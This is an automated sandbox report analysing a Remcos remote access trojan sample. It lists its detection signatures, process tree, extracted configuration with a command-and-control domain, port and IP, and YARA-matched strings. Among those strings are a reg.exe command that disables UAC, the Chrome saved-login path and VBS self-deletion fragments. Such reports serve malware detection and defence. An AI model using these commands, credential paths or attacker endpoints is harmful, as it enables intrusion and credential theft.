
Windows Analysis Report
4wECQoBvYC.exe

Overview

General Information

Sample name: 4wECQoBvYC.exe (renamed because the original name is a hash value)
Original sample name: 472cd96b1b5771243c40c10cd034324e.exe
Analysis ID: 1571962
MD5: 472cd96b1b5771243c40c10cd034324e
SHA1: e6544fd71357a36bf5bad454a2662ef3af7a4e03
SHA256: 24c3329fc783efce51593d5e4274008fcff8d86f8df9fd8a47ca0af8df1e031d
Tags: exe, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Deletes itself after installation
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign process
Installs a global keyboard hook
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample file name differs from the original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 4wECQoBvYC.exe (PID: 6172 cmdline: "C:\Users\user\Desktop\4wECQoBvYC.exe" MD5: 472CD96B1B5771243C40C10CD034324E)
    • 4wECQoBvYC.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\4wECQoBvYC.exe" MD5: 472CD96B1B5771243C40C10CD034324E)
      • wscript.exe (PID: 1864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Extracted malware configuration (Remcos):
{"Host:Port:Password": ["formationslistcomplet2.sexidude.com:30201:0"], "Assigned name": "sol4", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "kkdhhcnbvyrmqyodgffgfdds-SO2AWR", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "registro", "Keylog file max size": ""}
Source | Rule | Description | Author
00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Matched strings:
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
  Matched strings:
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author
2.2.4wECQoBvYC.exe.c0000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
2.2.4wECQoBvYC.exe.c0000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
2.2.4wECQoBvYC.exe.c0000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
2.2.4wECQoBvYC.exe.c0000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Matched strings:
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
2.2.4wECQoBvYC.exe.c0000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  Matched strings:
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\4wECQoBvYC.exe", ParentImage: C:\Users\user\Desktop\4wECQoBvYC.exe, ParentProcessId: 6580, ParentProcessName: 4wECQoBvYC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , ProcessId: 1864, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\4wECQoBvYC.exe", ParentImage: C:\Users\user\Desktop\4wECQoBvYC.exe, ParentProcessId: 6580, ParentProcessName: 4wECQoBvYC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , ProcessId: 1864, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\4wECQoBvYC.exe", ParentImage: C:\Users\user\Desktop\4wECQoBvYC.exe, ParentProcessId: 6580, ParentProcessName: 4wECQoBvYC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , ProcessId: 1864, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4wECQoBvYC.exe, ProcessId: 6172, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PerfectouinVans
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\4wECQoBvYC.exe", ParentImage: C:\Users\user\Desktop\4wECQoBvYC.exe, ParentProcessId: 6580, ParentProcessName: 4wECQoBvYC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , ProcessId: 1864, ProcessName: wscript.exe

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T22:42:09.541641+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 181.131.217.244 | 30201 | TCP
2024-12-09T22:42:10.906189+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 181.131.217.244 | 30201 | 192.168.2.5 | 49704 | TCP
2024-12-09T22:42:12.762647+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 178.237.33.50 | 80 | TCP

AV Detection

Source: formationslistcomplet2.sexidude.com | Avira URL Cloud: Label: malware
Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["formationslistcomplet2.sexidude.com:30201:0"], "Assigned name": "sol4", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "kkdhhcnbvyrmqyodgffgfdds-SO2AWR", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "registro", "Keylog file max size": ""}
Source: 4wECQoBvYC.exe | ReversingLabs: Detection: 28%
Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_004084F3 lstrcmp,CryptDecodeObject,LocalAlloc,CryptDecodeObject,0_2_004084F3
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_00408E76 LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCRLContext,CertFreeCRLContext,CertCloseStore,CryptMsgClose,0_2_00408E76
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_00408636 lstrcmp,CryptDecodeObject,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_00408636
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_004086CE lstrcmp,CryptDecodeObject,CryptDecodeObject,LocalAlloc,CryptDecodeObject,0_2_004086CE
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_004087AE _strlen,MultiByteToWideChar,CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CertFindCertificateInStore,_strlen,CertFindCertificateInStore,SystemTimeToFileTime,CertVerifyTimeValidity,0_2_004087AE
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_000F293A
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_004084F3 lstrcmpA,CryptDecodeObject,LocalAlloc,CryptDecodeObject,2_2_004084F3
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_00408636 lstrcmpA,CryptDecodeObject,FileTimeToLocalFileTime,FileTimeToSystemTime,2_2_00408636
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_004086CE lstrcmpA,CryptDecodeObject,CryptDecodeObject,LocalAlloc,CryptDecodeObject,2_2_004086CE
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_004087AE _strlen,MultiByteToWideChar,CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CertFindCertificateInStore,_strlen,CertFindCertificateInStore,SystemTimeToFileTime,CertVerifyTimeValidity,2_2_004087AE
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_00408E76 LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,2_2_00408E76
Source: 4wECQoBvYC.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C6764 _wcslen,CoGetObject,2_2_000C6764
Source: 4wECQoBvYC.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000CB335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_000CB335
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DB42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,2_2_000DB42F
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000CB53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_000CB53A
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_0010D5E9 FindFirstFileExA,2_2_0010D5E9
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C89A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,2_2_000C89A9
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C7A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,2_2_000C7A8C
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C6AC2 FindFirstFileW,FindNextFileW,2_2_000C6AC2
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000D8C69 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_000D8C69
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C8DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,2_2_000C8DA7
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C6F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_000C6F06

Networking

Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49704 -> 181.131.217.244:30201
Source: Network traffic | Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.131.217.244:30201 -> 192.168.2.5:49704
Source: Malware configuration extractor | URLs: formationslistcomplet2.sexidude.com
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 181.131.217.244:30201
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1, Host: geoplugin.net, Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 181.131.217.244
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49707 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DA51B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_000DA51B
Source: global traffic | DNS traffic detected: DNS query: formationslistcomplet2.sexidude.com
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
Source: 4wECQoBvYC.exe, 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: 4wECQoBvYC.exe, 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, 4wECQoBvYC.exe, 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp:
Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpq
Source: PerfectouinVans.exe.0.dr | String found in binary or memory: http://www.evenbalance.com/
Source: PerfectouinVans.exe.0.dr | String found in binary or memory: http://www.evenbalance.com/index.php?page=pbsvcfaq.php
Source: PerfectouinVans.exe.0.dr | String found in binary or memory: http://www.evenbalance.com/index.php?page=pbsvcfaq.phpChecking
Source: 4wECQoBvYC.exe, PerfectouinVans.exe.0.dr | String found in binary or memory: http://www.evenbalance.com/index.php?page=pbsvcfaq.phpDisplayVersion%d.%dDisplayNamePunkBuster
Source: 4wECQoBvYC.exe | String found in binary or memory: http://www.evenbalance.com/troubletick
Source: PerfectouinVans.exe.0.dr | String found in binary or memory: http://www.evenbalance.com/troubleticket/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C99E4 SetWindowsHookExA 0000000D,000C99D0,00000000,2_2_000C99E4
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\4wECQoBvYC.exe
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000D59C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_000D59C6
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C9B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,2_2_000C9B10
Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR

E-Banking Fraud

Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
